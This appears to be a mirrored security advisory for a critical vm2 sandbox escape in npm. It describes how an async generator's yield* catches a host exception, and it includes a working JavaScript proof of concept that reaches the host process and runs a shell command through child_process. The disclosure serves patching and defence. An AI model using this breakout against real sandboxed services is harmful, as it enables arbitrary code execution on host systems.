CRITICAL 9.8 npm
vm2 Has a Sandbox Breakout Using Async Generator
GHSA-248r-7h7q-cr24 · CVE-2026-45411
Published · Modified
Description
Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
Details
It is possible to catch a host exception using the yield* expression inside an async generator. When the generator is closed using the return function, the value is awaited on and exceptions thrown in the then call will be catched by the runtime and passed to the yield* iterator as the next value.
PoC
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
class E extends Error {}
function so(d) {
if (d > 0) so(d-1);
const e = new E();
e.stack;
throw e;
}
async function* helper() {
yield* {
[Symbol.asyncIterator]: ()=>({
next: v=>({value: v, done: false})
})
};
}
async function doCatch(f) {
const i=helper();
await i.next();
const v = await i.return({then(r){f();r();}});
return v.value;
}
(async function f() {
let min = 0;
let max = 10000000;
while (min<max) {
const mid = (min+max)>>1;
const e = await doCatch(()=>so(mid));
if (e.name==="RangeError" && !(e instanceof RangeError)) {
e.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
return;
}
if (e instanceof E) {
min = mid+1;
} else {
max = mid;
}
}
})();
`));
Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
References
- WEB https://github.com/patriksimek/vm2/security/advisories/GHSA-248r-7h7q-cr24
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-45411
- WEB https://github.com/patriksimek/vm2/commit/093494c0c3ef2390d2e56909f9d56e290e6f18b0
- PACKAGE https://github.com/patriksimek/vm2
- WEB https://github.com/patriksimek/vm2/releases/tag/v3.11.3
Ready to move
Start Securing
Free, no credit card | First findings in minutes